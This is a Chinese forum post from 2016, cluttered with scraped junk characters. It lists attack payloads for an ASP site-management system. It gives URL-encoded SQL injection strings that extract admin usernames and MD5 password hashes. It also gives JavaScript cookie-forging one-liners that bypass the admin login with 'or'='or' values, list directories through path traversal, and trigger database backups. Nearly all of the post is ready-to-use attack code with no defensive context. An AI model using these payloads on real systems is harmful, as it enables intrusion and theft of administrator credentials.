一、注入
# a! u. `9 i3 x" o1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2( w+ I+ S" a$ s4 [( Z! m. Q b0 v
( e! y& ?2 c; U" D2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
8 j, O2 q+ \. l! Q第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
* @1 @- W; k7 d0 f8 o+ v$ a( y可得到用户名和MD5加密码的密码。
0 F1 ~ ]0 q$ o5 w" L3 t1 b
: h+ N8 N. d5 I; `. p+ Q二、cookies欺骗
! f+ U- l7 G& U- X
9 O0 }; ^( \+ S$ _, d5 _5 h1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
5 F+ ^' s0 q$ C. njavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
/ ?' T, N; F3 R
. ~4 Y, z- u* @, N' c3 ^: Z' f2、列目录.
- r' t8 ^5 t& \4 hjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."6 c. [. v q3 O. D' A) s
* C2 r- P8 x5 ?- E* \* I: G
3、数据库备份(适用性好像比较低.) 4 |1 m( Z- m1 D: O. N
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
7 p9 {, y, g1 O C. y9 Y
- |0 T6 D1 F* @) F1 p$ W4、得到MD5密码解不了密进后台方法- o% C; L6 S7 } n9 a
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
' m g9 k! B# ^( A |
发表于 2016-5-11 14:55:08
收藏
支持
反对